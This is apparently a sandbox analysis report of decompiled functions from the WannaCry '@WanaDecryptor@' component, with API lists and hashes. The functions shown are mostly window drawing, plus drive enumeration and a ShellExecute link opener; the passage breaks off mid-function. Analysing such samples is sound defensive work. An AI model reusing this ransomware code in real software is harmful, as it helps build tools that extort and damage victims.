                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00404EB0(void* __ecx) {
                                                      				intOrPtr _v0;
                                                      				int _v8;
                                                      				struct tagRECT _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				char _v40;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v72;
                                                      				char* _t20;
                                                      				int _t23;
                                                      				void* _t45;
                                                      				intOrPtr _t48;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413870);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t48;
                                                      				_t45 = __ecx;
                                                      				GetClientRect( *(__ecx + 0x20),  &_v28);
                                                      				_push( *((intOrPtr*)(_t45 + 0x6c)));
                                                      				L00412D76();
                                                      				_t20 =  &_v40;
                                                      				_push(_t20);
                                                      				_v8 = 0;
                                                      				L00412D70();
                                                      				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                                      				_push(_t20);
                                                      				L00412D70();
                                                      				_v72 = 0x415c00;
                                                      				_v40 = 1;
                                                      				L00412D52();
                                                      				 *[fs:0x0] = _v48;
                                                      				return _t23;
                                                      			}















                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                                      • Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
                                                      • Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                                      • Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E00404310(void* __ecx) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v40;
                                                      				intOrPtr _v48;
                                                      				void* _v96;
                                                      				void* _v100;
                                                      				void* _v104;
                                                      				void* _v108;
                                                      				intOrPtr _v112;
                                                      				void* _v128;
                                                      				void* _v132;
                                                      				void* _t20;
                                                      				void* _t22;
                                                      				void* _t39;
                                                      				intOrPtr _t40;
                                                      				intOrPtr _t42;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004137A8);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t42;
                                                      				_t39 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
                                                      					E004044C0(__ecx, 0);
                                                      				}
                                                      				L00412DD0();
                                                      				_t20 = _t39 + 0x48;
                                                      				_v8 = 0;
                                                      				L00412DCA();
                                                      				L00412DC4();
                                                      				L00412DBE();
                                                      				_t40 =  *((intOrPtr*)(_t39 + 0x40));
                                                      				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
                                                      				_push(_t20);
                                                      				L00412DCA();
                                                      				_v40 = 0xffffffff;
                                                      				L00412DB8();
                                                      				 *[fs:0x0] = _v48;
                                                      				return _t22;
                                                      			}


















                                                      APIs
                                                      • #470.MFC42(?,00000000), ref: 0040433F
                                                      • #5789.MFC42 ref: 00404354
                                                      • #5875.MFC42(00000001), ref: 00404361
                                                      • #6172.MFC42(?,00000001), ref: 0040436E
                                                      • #5789.MFC42(00000000), ref: 0040438F
                                                      • #755.MFC42(00000000), ref: 004043A0
                                                        • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
                                                        • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
                                                        • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                                        • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
                                                        • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                                        • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
                                                        • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
                                                      • String ID:
                                                      • API String ID: 3301245081-0
                                                      • Opcode ID: cf1f65109254071a6a46f66f86cff4d395b2f690d68131f85178f7e4ade46d7e
                                                      • Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
                                                      • Opcode Fuzzy Hash: cf1f65109254071a6a46f66f86cff4d395b2f690d68131f85178f7e4ade46d7e
                                                      • Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 46%
                                                      			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
                                                      				intOrPtr _t9;
                                                      
                                                      				_t9 = _a4;
                                                      				_push(_t9);
                                                      				_push(0x407);
                                                      				L00412CE6();
                                                      				L00412D88();
                                                      				_push(_t9);
                                                      				_push(0x408);
                                                      				L00412CE6();
                                                      				L00412D88();
                                                      				_push(_t9);
                                                      				_push(2);
                                                      				L00412CE6();
                                                      				L00412D88();
                                                      				return __eax;
                                                      			}





                                                      APIs
                                                      • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                                      • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                                      • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                                      • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                                      • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                                      • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2642#3092
                                                      • String ID:
                                                      • API String ID: 2547810013-0
                                                      • Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                                      • Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
                                                      • Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                                      • Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00403A20(intOrPtr _a4, intOrPtr _a8) {
                                                      				union _ULARGE_INTEGER _v8;
                                                      				union _ULARGE_INTEGER _v16;
                                                      				intOrPtr _v20;
                                                      				union _ULARGE_INTEGER _v24;
                                                      				short _v28;
                                                      				short _v32;
                                                      				short _t23;
                                                      				short _t34;
                                                      				signed int _t47;
                                                      				unsigned int _t50;
                                                      
                                                      				if( *((intOrPtr*)(_a8 + 8)) != 0) {
                                                      					return 1;
                                                      				} else {
                                                      					_t50 = GetLogicalDrives();
                                                      					_t47 = 2;
                                                      					do {
                                                      						if((_t50 >> _t47 & 0x00000001) != 0) {
                                                      							_t23 =  *L" : "; // 0x3a0020
                                                      							_t34 =  *0x420760; // 0x20
                                                      							_v32 = _t23;
                                                      							_t7 = _t47 + 0x41; // 0x43
                                                      							_v28 = _t34;
                                                      							_v32 = _t7;
                                                      							_v28 = 0x5c;
                                                      							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
                                                      								_v28 = 0;
                                                      								E004026B0(_a4,  &_v32);
                                                      							}
                                                      						}
                                                      						_t47 = _t47 + 1;
                                                      					} while (_t47 <= 0x19);
                                                      					return 1;
                                                      				}
                                                      			}














                                                      APIs
                                                      • GetLogicalDrives.KERNEL32 ref: 00403A35
                                                      • GetDriveTypeW.KERNEL32 ref: 00403A7A
                                                      • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DiskDriveDrivesFreeLogicalSpaceType
                                                      • String ID: : $\
                                                      • API String ID: 222820107-856521285
                                                      • Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                                      • Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
                                                      • Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                                      • Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 89%
                                                      			E00406EF0(void* __ecx, char* _a4, void** _a8) {
                                                      				char* _v4;
                                                      				char _v8;
                                                      				void* _v12;
                                                      				char* _t14;
                                                      				char _t15;
                                                      				char* _t17;
                                                      				struct HWND__* _t18;
                                                      				char _t23;
                                                      
                                                      				_t14 = _a4;
                                                      				if(_t14[0xc] != 0x201) {
                                                      					L5:
                                                      					 *_a8 = 0;
                                                      					return _t14;
                                                      				}
                                                      				_t23 = _t14[0x18];
                                                      				_t15 = _t14[0x1c];
                                                      				_v8 = _t15;
                                                      				_t17 = _t15 - _t23 + 1;
                                                      				_v12 = _t23;
                                                      				_push(_t17);
                                                      				L00412CEC();
                                                      				_v4 = _t17;
                                                      				if(_t17 != 0) {
                                                      					_t18 = __ecx + 0x4c0;
                                                      					if(_t18 != 0) {
                                                      						_t18 =  *(_t18 + 0x20);
                                                      					}
                                                      					SendMessageA(_t18, 0x44b, 0,  &_v12);
                                                      					ShellExecuteA(0, "open", _v4, 0, 0, 5);
                                                      					_t14 = _v4;
                                                      					_push(_t14);
                                                      					L00412C98();
                                                      					goto L5;
                                                      				}
                                                      				return _t17;
                                                      			}












                                                      APIs
                                                      • #823.MFC42(?), ref: 00406F15
                                                      • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
                                                      • #825.MFC42(?), ref: 00406F62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #823#825ExecuteMessageSendShell
                                                      • String ID: open
                                                      • API String ID: 1093558810-2758837156
                                                      • Opcode ID: fd047fd9ae49066b11ca0bfdd1a15bae3696c59196635434c28e1a6aef66c3a1
                                                      • Instruction ID: 5f9a2cd0b307edef7ddb37fa3a9b8e73568683458afc550aac563bbb23be8fd8
                                                      • Opcode Fuzzy Hash: fd047fd9ae49066b11ca0bfdd1a15bae3696c59196635434c28e1a6aef66c3a1
                                                      • Instruction Fuzzy Hash: 0C0148B0A50301AFE610DF24DD4AF5B77E8AB84B14F00C42AF9499B291E6B4E814CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 67%
                                                      			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
                                                      				char _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t30;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004135B3);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t30;
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(0x8a);
                                                      				_v16 = __ecx;
                                                      				L00412C92();
                                                      				_v12 = 0;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
                                                      				_v12 = 1;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
                                                      				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
                                                      				 *((intOrPtr*)(__ecx)) = 0x415958;
                                                      				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
                                                      				 *[fs:0x0] = _v20;
                                                      				return __ecx;
                                                      			}








                                                      APIs
                                                      • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                                      • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                                      • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #567$#324
                                                      • String ID: 0ZA$DZA
                                                      • API String ID: 784016053-3838179817
                                                      • Opcode ID: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                                      • Instruction ID: 8222d1989983ac506c5d09346421d66fb4ae1402eeff5ebed15e971907ed65db
                                                      • Opcode Fuzzy Hash: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                                      • Instruction Fuzzy Hash: 430169B1244B42CBD310CF19C580BDAFBE4FB84750F90892EE1AA9B741C3B864458B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
                                                      				char _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _t24;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413809);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t24;
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(0x89);
                                                      				_v16 = __ecx;
                                                      				L00412C92();
                                                      				_v12 = 0;
                                                      				L00412DA6();
                                                      				 *((intOrPtr*)(__ecx + 0x68)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
                                                      				_push(0x421798);
                                                      				_v12 = 3;
                                                      				 *((intOrPtr*)(__ecx)) = 0x415ec8;
                                                      				L00412DA0();
                                                      				 *[fs:0x0] = _v24;
                                                      				return __ecx;
                                                      			}








                                                      APIs
                                                      • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
                                                      • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
                                                      • #860.MFC42(00421798), ref: 00404CAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #324#540#860
                                                      • String ID: 0ZA$DZA
                                                      • API String ID: 1048258301-3838179817
                                                      • Opcode ID: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                                      • Instruction ID: 18ed51ee5778a88a9d54698e5e0d11c9dbfb79b85878934ba46accb8ddaa74ae
                                                      • Opcode Fuzzy Hash: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                                      • Instruction Fuzzy Hash: 880169B1644B50DBD311DF09D605BAABBE4FBD1B24F004A1EF1928B790C7BC95488BDA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E00408B40(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t23;
                                                      				int _t25;
                                                      				intOrPtr _t30;
                                                      				int _t38;
                                                      				int _t41;
                                                      				intOrPtr* _t43;
                                                      				int _t45;
                                                      				intOrPtr _t47;
                                                      				struct HDC__* _t50;
                                                      				intOrPtr _t52;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041407B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t52;
                                                      				_t47 = __ecx;
                                                      				_v20 = __ecx;
                                                      				 *((intOrPtr*)(__ecx)) = 0x4166e0;
                                                      				_t23 =  *((intOrPtr*)(__ecx + 0x30));
                                                      				_t50 = 0;
                                                      				_v4 = 1;
                                                      				if(_t23 == 0) {
                                                      					 *((intOrPtr*)(__ecx + 8)) = 0;
                                                      					 *(__ecx + 4) = 0;
                                                      				} else {
                                                      					_t41 =  *(__ecx + 0x24);
                                                      					_t45 =  *(__ecx + 0x20);
                                                      					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
                                                      					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
                                                      					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
                                                      					if(__ecx != 0) {
                                                      						_t50 =  *(__ecx + 4);
                                                      					}
                                                      					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
                                                      					_t23 =  *((intOrPtr*)(_t47 + 0x18));
                                                      					if(_t23 != 0) {
                                                      						_t23 =  *((intOrPtr*)(_t23 + 4));
                                                      						_push(_t23);
                                                      						_push( *((intOrPtr*)(_t47 + 4)));
                                                      						L00412E48();
                                                      					} else {
                                                      						_push(_t23);
                                                      						_push( *((intOrPtr*)(_t47 + 4)));
                                                      						L00412E48();
                                                      					}
                                                      				}
                                                      				_t43 = _t47 + 0x10;
                                                      				_v16 = _t43;
                                                      				 *_t43 = 0x415c00;
                                                      				_v4 = 2;
                                                      				L00412D52();
                                                      				 *_t43 = 0x415bec;
                                                      				_v4 = 0xffffffff;
                                                      				L00412E3C();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t23;
                                                      			}

                                                      APIs
                                                      • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
                                                      • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
                                                      • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
                                                      • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5785$#2414#640
                                                      • String ID:
                                                      • API String ID: 2719443296-0
                                                      • Opcode ID: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                                      • Instruction ID: 86c9330ab4234590f1f3c164cda9a19739b95e23c8a4d3600225c259667158ab
                                                      • Opcode Fuzzy Hash: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                                      • Instruction Fuzzy Hash: E1215CB5200B419FC324DF1ACA44A67FBE8EB88710F008A1EF59697781D7B8F8458B65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E00404530(void* __ecx) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				struct HDC__* _v32;
                                                      				void* _v36;
                                                      				struct tagSIZE _v48;
                                                      				void* _v56;
                                                      				intOrPtr _v60;
                                                      				intOrPtr _v64;
                                                      				int _t21;
                                                      				void* _t22;
                                                      				intOrPtr _t41;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004137C8);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t41;
                                                      				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
                                                      				if(_t21 == 0) {
                                                      					_t21 =  *((intOrPtr*)(__ecx + 0x58));
                                                      					if(_t21 != 0) {
                                                      						_push(__ecx);
                                                      						L00412DEE();
                                                      						_t22 = __ecx + 0x48;
                                                      						_push(_t22);
                                                      						_v8 = 0;
                                                      						L00412DCA();
                                                      						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
                                                      						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
                                                      						_push(_t22);
                                                      						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
                                                      						L00412DCA();
                                                      						 *((char*)(__ecx + 0x5a)) = 1;
                                                      						_v32 = 0xffffffff;
                                                      						L00412DE8();
                                                      					}
                                                      				}
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t21;
                                                      			}

                                                      APIs
                                                      • #289.MFC42 ref: 0040455F
                                                      • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                                      • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                                      • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                                      • #613.MFC42 ref: 004045BB
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#289#613ExtentPoint32Text
                                                      • String ID:
                                                      • API String ID: 888490064-0
                                                      • Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                                      • Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
                                                      • Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                                      • Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E004031A0(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t15;
                                                      				intOrPtr* _t24;
                                                      				intOrPtr* _t25;
                                                      				intOrPtr _t30;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004135FF);
                                                      				_t15 =  *[fs:0x0];
                                                      				_push(_t15);
                                                      				 *[fs:0x0] = _t30;
                                                      				_v20 = __ecx;
                                                      				_v4 = 0;
                                                      				_t24 = __ecx + 0xec;
                                                      				_v16 = _t24;
                                                      				 *_t24 = 0x415c00;
                                                      				_v4 = 4;
                                                      				L00412D52();
                                                      				 *_t24 = 0x415bec;
                                                      				_t25 = __ecx + 0xe0;
                                                      				_v16 = _t25;
                                                      				 *_t25 = 0x415c00;
                                                      				_v4 = 5;
                                                      				L00412D52();
                                                      				 *_t25 = 0x415bec;
                                                      				_v4 = 1;
